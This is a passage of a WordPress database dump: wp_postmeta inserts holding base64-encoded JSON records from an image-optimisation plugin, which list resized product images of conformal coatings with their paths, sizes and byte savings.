a3VwXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNTUwLCJpZCI6MTQwM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE1NTMsImlkIjoxNDAzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNTU3LCJpZCI6MTQwM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE1NTksImlkIjoxNDAzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTU2MiwiaWQiOjE0MDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNTY0LCJpZCI6MTQwM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE1NjcsImlkIjoxNDAzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxNjgsInRpbWUiOjE0ODM1NzE1NzAsImlkIjoxNDAzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMTgsInRpbWUiOjE0ODM1NzE1NzIsImlkIjoxNDAzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxNDEsInRpbWUiOjE0ODM1NzE1NzUsImlkIjoxNDAzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDY1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNTc4LCJpZCI6MTQwM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTU4MCwiaWQiOjE0MDN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE1ODMsImlkIjoxNDAzfV0='); 
INSERT INTO `wp_postmeta` VALUES (29539, 1402, 'wpfc_optimisation_reduction', '2351553'); 
INSERT INTO `wp_postmeta` VALUES (29540, 1402, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYyaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2Mmgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmcuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2Mmgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmcuanBnIiwicmVkdWN0aW9uIjoyMzUxNDQ5LCJ0aW1lIjoxNDgzNTcxNTk0LCJpZCI6IjE0MDIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2Mmgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjJoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDYyaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTU5NywiaWQiOjE0MDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYyaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2Mmgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjJoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNjAwLCJpZCI6MTQwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjJoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYyaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2Mmgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE2MDMsImlkIjoxNDAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2Mmgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYyaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDYyaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNjA3LCJpZCI6MTQwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjJoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYyaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2Mmgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE2MDksImlkIjoxNDAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2Mmgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjJoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDYyaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTYxMiwiaWQiOjE0MDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYyaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2Mmgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjJoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxNjE0LCJpZCI6MTQwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjJoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYyaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2Mmgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE2MTcsImlkIjoxNDAyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYyaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2Mmgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjJoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo5MSwidGltZSI6MTQ4MzU3MTYyMCwiaWQiOjE0MDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NjJoLXNpbGljb25lLWNvbmZvcm1hbC1jb2F0aW5nLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYyaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ2Mmgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE2MjIsImlkIjoxNDAyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDYyaC1zaWxpY29uZS1jb25mb3JtYWwtY29hdGluZy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ2Mmgtc2lsaWNvbmUtY29uZm9ybWFsLWNvYXRpbmctMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NjJoLXNpbGljb25lLWNvbmZvcm1hbC1jb